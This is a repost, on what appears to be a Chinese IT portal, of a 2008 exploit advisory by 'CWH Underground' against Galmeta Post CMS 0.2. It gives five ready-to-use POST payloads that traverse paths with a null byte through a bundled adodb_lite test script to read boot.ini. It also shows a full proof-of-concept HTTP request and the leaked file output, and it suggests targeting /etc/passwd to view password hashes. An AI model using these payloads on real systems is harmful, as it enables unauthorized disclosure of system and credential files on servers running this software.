网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > Exploit > Galmeta Post CMS 0.2 Multiple Local File Inclusion Vulnerabilities  

Galmeta Post CMS 0.2 Multiple Local File Inclusion Vulnerabilities

2008-06-27  作者:bitsCN整理  来源:中国网管联盟  点评 投稿 收藏

==================================================================
  Galmeta Post CMS Multiple Local File Inclusion Vulnerabilities
==================================================================
网管联盟bitsCN@com

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /          
  / XXXXXX /
 (________(            
  `------'

网管bitscn_com


AUTHOR : CWH Underground
DATE   : 26 June 2008
SITE   : cwh.citec.us 网管网www_bitscn_com


#####################################################
 APPLICATION : Galmeta Post CMS
 VERSION     : 0.2
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/galmetapost
#####################################################

中国网管联盟bitsCN.com

--- Multiple Local File Inclusion [POST Method] ---

网管bitscn_com


----------
 Exploits
---------- 网管bitscn_com

[+] http://[Target]/[post_blog_path]/_lib/adodb_lite/tests/test_adodb_lite.php 网管联盟bitsCN_com

    [-] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
    [-] databasetype=mysql&transactions=../../../../../../../boot.ini%00&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
    [-] databasetype=mysql&transactions=transaction%3A&adodblite=../../../../../../../boot.ini%00&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
    [-] databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=../../../../../../../boot.ini%00&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit 网管u家u.bitsCN.com
    [-] databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=extend%3A&date=../../../../../../../../boot.ini%00&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit 网管联盟bitsCN@com

    This exploit will open boot.ini in system file:

网管论坛bbs_bitsCN_com

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect 网管联盟bitsCN@com

    You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash. 网管网www_bitscn_com

-------------
 POC Exploit
-------------

中国网管联盟bitsCN.com

[+] POST Method
[+]
[+] POST http://192.168.24.25/post_blog/_lib/adodb_lite/tests/test_adodb_lite.php HTTP/1.0
[+] Accept: */*
[+] Content-Type: application/x-www-form-urlencoded
[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
[+] Host: 192.168.24.25
[+] Content-Length: 309
[+] Cookie: PHPSESSID=842f465924119eaa2b0fd3664fcc3b14
[+] Connection: Close
[+]
[+] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit

网管u家u.bitsCN.com


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

网管论坛bbs_bitsCN_com



TAGs         cwh&   Submit%20Form   extend   dsn_connection      
 上一篇:PolyPager <= 1.0rc2 (SQL/XSS) Multiple Remote Vulnerabilities   下一篇:Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
Galmeta Post CMS 0.2 Multiple Local File Inclusion Vulnerabilities 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
最新推荐文章:
网管论坛交流: